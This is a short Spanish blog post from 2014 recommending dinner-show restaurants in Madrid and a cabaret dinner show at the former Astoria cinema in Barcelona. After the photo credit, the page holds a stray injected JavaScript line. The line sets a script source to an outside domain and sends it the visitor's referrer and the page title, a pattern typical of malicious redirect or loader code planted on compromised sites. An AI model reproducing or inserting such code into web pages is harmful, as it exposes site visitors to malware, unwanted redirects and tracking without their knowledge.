Cenas entretenidas

04/02/2014

02- Casa PatasA imagen y semejanza de La Ópera y Casa Patas, ambos en Madrid, llegan ahora  opciones similares a la ciudad condal. ¿De qué estamos hablando? Pues de restaurantes que entre sus delicatessen cuentan con espectáculos en directo para amenizar las cenas. En La Ópera, como su nombre bien indica, disfrutas de platos exquisitos al son de óperas de todos los tiempos. En Casa Patas saboreas gastronomía española tradicional mientras alegras tus oídos con unos cantes flamencos de categoría y ves a expertos bailaores moverse al ritmo de la música.

Desde ya Barcelona propone un espectáculo cabaretero llamado Circus Cabaret en el antiguo cine Astoria, en pleno Eixample barcelonés. Disfrutarás de una rica cena mientras el grupo Costa Este se mueve y canta con gran profesionalidad. Harán que te traslades a a diversas épocas, pasadas, y no tan pasadas…, conocerás el Berlín de los años 40, te surmegirás en pleno Broadway ochentero o descubrirás el krumping: ¡entre otros muchos ejemplos! El caso es pasar un buen rato y gozar no solo del show sino también de la propuesta gastronómica.

Foto |  Manon71

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO